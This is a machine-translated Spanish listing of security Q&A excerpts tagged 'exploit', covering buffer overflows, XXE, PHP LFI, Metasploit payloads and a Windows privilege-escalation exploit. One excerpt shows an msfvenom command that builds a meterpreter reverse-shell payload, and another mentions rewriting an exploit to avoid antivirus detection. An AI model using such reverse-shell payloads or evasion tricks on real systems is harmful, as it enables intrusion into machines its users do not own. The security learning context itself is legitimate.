Preguntas con etiqueta 'exploit'

0
respuestas

Problema con la explotación del desbordamiento del búfer: no se puede encontrar el búfer libre para su uso

Esto no es una publicación duplicada, vi la otra publicación y no es el mismo problema:    Desbordamiento de búfer no tener suficiente espacio para explotar después de estrellarse Tengo ejercicio de desbordamiento de búfer. Después de u...
hecha 16.11.2018 - 22:01
0
respuestas

javax.xml. * Explotación XXE

Durante un compromiso de Pentest, encontré una vulnerabilidad XXE en un servicio web SOAP escrito en Java, el sistema operativo es Windows Server y estoy tratando de demostrar qué tan grave es la vulnerabilidad. El problema es que solo puedo lee...
hecha 06.11.2018 - 21:47
1
respuesta

PHP LFI corrige con los permisos de archivo correctos

Estoy tratando de entender cómo realizar un LFI (específicamente PHP LFI), y hay un aspecto de Este ataque que parece que nunca se discute en los artículos en línea que leí: El archivo inyectado permisos . De hecho, supongamos que puedo in...
hecha 28.11.2018 - 04:08
1
respuesta

En Metasploit, ¿cómo usar un archivo personalizado como carga útil?

La pregunta estuvo una vez en una lista de correo pero no fue respondida. Quiero usar un archivo ejecutable personalizado como carga útil en metasploit. Por ejemplo, cuando uso exploit / multi / browser / java_atomicreferencearray y quiero ejecu...
hecha 13.04.2012 - 14:22
0
respuestas

Carga genérica / personalizada de Metasploit

He generado una carga útil personalizada utilizando msfvenom como tal ( Primero quiero probar con la carga útil personalizada más simple: sin codificador ni nada ): msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=...
hecha 23.11.2018 - 21:59
0
respuestas

Problema con la explotación del escalado de privilegios locales 'TrackPopupMenu' (MS14-058)

Acabo de empezar a entrar en la escalada de privilegios locales y me encontré con un problema. Descargué MS15-058 de la base de datos de exploits ( enlace ) e hice algunas reescrituras para evitar la detección de av. El .py final se llama "shell...
hecha 11.11.2018 - 13:11
1
respuesta

Seguimiento de envío que muestra la información de entrega públicamente. ¿Es esto peligroso?

Fondo : Muchas compañías de envío (como DHL, UPS, servicios postales nacionales, etc.) permitirán que el destinatario de un paquete rastree su paquete en línea y, a menudo, mostrará la dirección a la que se entrega el paquete antes de que se h...
hecha 12.11.2018 - 21:20
0
respuestas

CVE-2013-0333 Ruby on Rails Yaml Exploit Question

Tengo una pregunta sobre el exploit de Ruby Rails JSON. Entiendo cómo funciona, pero no entiendo cómo se logra la ejecución del código. Entiendo YAML y cómo construye varios objetos serializados, pero una ruta de explotación común implica el...
hecha 14.10.2018 - 18:25
1
respuesta

Cómo responder a la solicitud HTTP de Meterpreter enviada desde el cliente

Primero que nada, disculpas por los errores, ya que estoy en el nivel de principiante. Estaba explorando el controlador HTTP de Meterpreter. He creado una carga útil con meterpreter HTTP inverso y escribo mi propio servidor http para manejar las...
hecha 13.10.2018 - 09:36
4
respuestas

¿El desarrollo del exploit tiene futuro? [cerrado]

¿El desarrollo del exploit tiene futuro? Quiero decir que hay muchos fuzzers que pueden encontrar errores mejor y con menos tiempo que los humanos. Y hoy hay muchos fuzzers geniales. Me encanta el desarrollo de exploits, pero ¿vale la p...
hecha 08.12.2018 - 15:06